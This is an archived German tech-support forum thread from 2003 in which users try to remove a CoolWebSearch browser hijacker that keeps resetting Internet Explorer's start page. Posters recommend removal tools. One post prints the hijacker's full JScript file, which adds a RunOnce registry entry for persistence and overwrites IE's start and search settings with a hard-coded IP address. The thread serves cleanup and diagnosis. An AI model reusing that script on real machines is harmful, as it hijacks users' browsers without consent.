1. Liebe Forumsgemeinde,

aufgrund der Bestimmungen, die sich aus der DSGVO ergeben, müssten umfangreiche Anpassungen am Forum vorgenommen werden, die sich für uns nicht wirtschaftlich abbilden lassen. Daher haben wir uns entschlossen, das Forum in seiner aktuellen Form zu archivieren und online bereit zu stellen, jedoch keine Neuanmeldungen oder neuen Kommentare mehr zuzulassen. So ist sichergestellt, dass das gesammelte Wissen nicht verloren geht, und wir die Seite dennoch DSGVO-konform zur Verfügung stellen können.
    Dies wird in den nächsten Tagen umgesetzt.

Ich danke allen, die sich in den letzten Jahren für Hilfesuchende und auch für das Forum selbst engagiert haben. Ich bin weiterhin für euch erreichbar unter tti(bei)pcwelt.de.
    Dismiss Notice

Startseite

Discussion in 'Browser' started by BadBehaviour, Dec 15, 2003.

Thread Status:
Not open for further replies.
  1. Ich habe das Problem, dass sich eine Internet Adresse selbsttätig in meinen Internet Explorer als Startseite eingetragen hat (http://81.211.105.9/index.php?v=1)
    Wie bekomme ich diese wieder weg?
    Wenn ich es über Extras/internetoptionen ändere ist nach dem Neustart wieder die besagte Seite als Startseite eingetragen.
    Auch wenn ich den Explorer Offline öffne.

2. ManniBear

ManniBear Megabyte

Indem ich per Google und im Spybot-Forum nach dem Begriff "t.rack.cc" gesucht habe.

Das Programm gibt es schon länger und wird immer wieder aktualisiert, da die CWS-Macher sich immer wieder neue Tricks einfallen lassen. Nachzulesen hier:

http://www.spywareinfo.com/~merijn/cwschronicles.html

Und auch dir wünsche ich schöne Feiertage!

Mfg Manni

3. Vielen Dank Manni !

Das Programm hat mein Problem gelöst.
    Hatte mir schon seit Tagen den Kopf darüber zerbrochen und gleich neu installieren wollte ich auch nicht unbedingt.
    Wie bist Du denn auf das Programm gestoßen? Würde mich mal interessieren !

Also nochmals Danke und noch schöne Feiertage !

Gruß, Rainer !

4. ManniBear

ManniBear Megabyte

@ blackstingray

Scheint sich um eine CoolWebSearch-Infektion zu handeln. Du solltest das darauf spezialisierte Programm CWShredder (ist vom selben Autor wie HijackThis) mal dein System überprüfen lassen:

http://www.merijn.org/files/cwshredder.zip

Mfg Manni

5. Hallo !

Habe ebenfalls Probleme damit, daß meine Startseite immer wieder mit der URL : t.rack.cc/h.php?aid=331 überschrieben wird.
    Die oben schon genannte Datei existiert aber bei mir nicht.
    Muß bei mir wohl einen anderen Namen haben.
    Wie kann ich diese Datei aufspüren ?
    Bitte um Hilfe !
    Danke im Voraus !

PS: habe bereits spybot installiert, findet zwar die geänderten Registrierungseinträge, aber nicht den Verursacher.

6. Damocles

Damocles Halbes Megabyte

Hi!
    Ich habe ein ähnliches Problem. ich kann nicht meine Startseite angeben. das ist nur grau!
    Kennt wer die Lösung?

Jh

7. Hovercraft

Hovercraft Kbyte

Hi Kromb14,

Danke nochmal, hatte diesen Bullshit auch bei mir drauf. Verstehe nicht warum ADAWARE da nicht gemeckert hat. Naja.
    Wenn es sonst weiter nichts ist. Wir kann eigentlich so ne Sch...JScript überhaupt sich im Windows Ordner festkrallen?

Gruß HOVERCRAFT

PS: Hätte der Symantec Firewall da etwas gemeldet?

8. Kromb14

Kromb14 ROM

Habe das selbe problem,
    habe im Ordner Windows die datei update911.js
    gefunden mit folgenden Inhalt:

var url = "http://81.211.105.9/index.php?v=1";
    var burl = "http://81.211.105.9/search.php?v=1";
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var tfolder = fso.GetSpecialFolder(0);
    var filepath = tfolder + "\\update911.js";
    var Shell = new ActiveXObject("WScript.Shell");
    Shell.RegWrite(" HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
    \\RunOnce\\tlc",filepath);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

Die Datei löschen/umbennen und die regestrie einträge entfernen,
    bei Extras und Interneteinstellung auf leere Seite stellen,
    Neustart durchführen und schon klappt alles wieder.

9. John Cage

John Cage Byte

Gucke doch mal in Deinem Windows\system32 Ordner nach, ob sich da eine neue exe.datei eingeschlichen hat !

John Cage

10. ManniBear

ManniBear Megabyte

Welche Startseite wird denn aufgerufen?

Ansonsten solltest du mit HijackThis ein Logfile erstellen und dieses dann hier posten. So kann man evtl. feststellen wo das Problem liegt.

Mfg Manni

11. MT

MT Byte

Ich hab genau das selbe Problem mit der Startseite.

Mein System hab ich mit Spybot, Adaware und Pestpatrol und Virenscanner durchsucht und nichts gefunden. Auch nach Löschen aller Cookies und temporary Internetfiles kommt die selbe Startseite.
    Es lassen sich auch in der Registry die Einträge die sich auf die Startseite beziehen nicht dauerhaft ändern. Die "Super Search" Startseite kommt immer wieder!

Gibt es Patches oder Fixes für dieses Problem?

12. goemichel

goemichel Guest

Dann versuch es mal mit "adaware" :)

13. goemichel

goemichel Guest

oops, natürlich erst aktualisieren, die Version 1.2 ist schon etwas alt in der Grundausstattung. ;)

14. goemichel

goemichel Guest

15. ebenfalls kein erfolg :(
    Ich glaube ich werde mir einen neuen Explorer drauf spielen müssen.
    Welchen kann man den empfehlen bzw welcher ist (zumindest vom aussehen) ähnlich?

16. Habe ich auch.
    hat auch ein paar dateien/keys gefunden, aber mein Problem nicht gelöst...

17. Program downloaden, ausführen, ferig, problem besteht immernoch.

Thread Status:
Not open for further replies.

Share This Page